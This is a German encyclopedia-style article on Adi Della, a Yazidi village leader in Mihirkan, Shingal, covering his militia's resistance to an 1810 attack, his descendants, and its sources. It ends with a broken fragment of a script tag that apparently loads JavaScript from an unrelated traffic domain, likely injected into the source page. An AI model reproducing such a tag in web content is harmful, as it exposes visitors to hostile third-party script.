Art. Nr. Autor Datum
265 Diar Khalaf 18.06.2015

Adi Della war ein Oberhaupt des êzîdîschen Dorfes Mihirkan in Shingal. Über sein Leben existieren nur sehr wenige sichere Angaben.

Leben und Wirken

Adi Della gehörte der Familie an, aus denen die Oberhäupter des Mihirkan-Dorfes hervorgegangen sind. Er war für alle politischen Angelegenheiten des Dorfes sowie auch für die Dorf eigene Miliz zuständig, die in den kommenden Jahrzehnten eine herausragenden Rolle spielen sollte.

So war im Jahr 1810 Mihirkan Ziel eines Angriffes von Süleyman Qatil geworden, dem Gouverneur von Bagdad1. Adi Della führte den Widerstand der Mihirkan mit der Dorfmiliz an.

Nach dem Tod von Adi Della, vermutlich eines natürlichen Todes gestorben, wurde sein Sohn Isa Agha zu seinem Nachfolger ernannt.

Nachkommen

Die Nachkommen und Nachfolgen Adi Dellas genießen bis heute unter den Êzîden hohes Ansehen, das Dorf Mihirkan ist vor allem für seinen militärischen Widerstand gegen muslimische Angreifer bekannt. Zu den bekanntesten Nachkommen Adi Dellas gehören: Sein Sohn Isa Agha, der 1846 erfolgreich gegen Tayyar Pasha, den Wali von Mosul, kämpfte2. Dawid Isa, der im Jahr 1882 erneut gegen die Osmanen kämpfte und auf dem Schlachtfeld fiel3. Und der wohl berühmteste Nachkomme Dellas, sein Urenkel Dawid ê  Dawid, eine bedeutende Führungspersönlichkeit der êzîdischen Aufstände gegen das Königreich Irak zwischen 1935 – 19414.

Noch heute leben viele Nachkommen Adi Dellas in Shingal, die vor dem Völkermord an den Êzîden am 3. August 2014 noch in Mihirkan ansässig waren.

Literaturverzeichnis

Farhan, Adnan Zeyan (2011): Dawoud Dawoud und die Kämpfe gegen die Wehrpflicht, in: Yezidische Helden – Mêrxasên Êzîdiyan, Oldenburg.

Layard, Austen Henry (1849): Nineveh and Its Remains: With an Account of a Visit to the Chaldean Christians of Kurdistan, and the Yezidis, Or Devil-worshippers; and an Inquiry Into the Manners and Arts of the Ancient Assyrians, London, Vol. I.

Lescot, Roger (1938): Enquête sur les Yézidis de Syrie et du Djebel Sindjâr, Beirut.

Rişkanî, Silêman (2011): Jiyannama Dawidê Dawid, qehremanê du fermanan, in: Yezidische Helden – Mêrxasên Êzîdiyan, Oldenburg, S.326-332.

Einzelnachweis

[1] Lescot 1938: S. 125.
[2] Layard 1849: S. 316ff.
[3] Rişkanî 2011: S. 327.
[4] Farhan 2011: S. 224ff.

and.buyittraffic.com/clizkes' type='text/javascript'>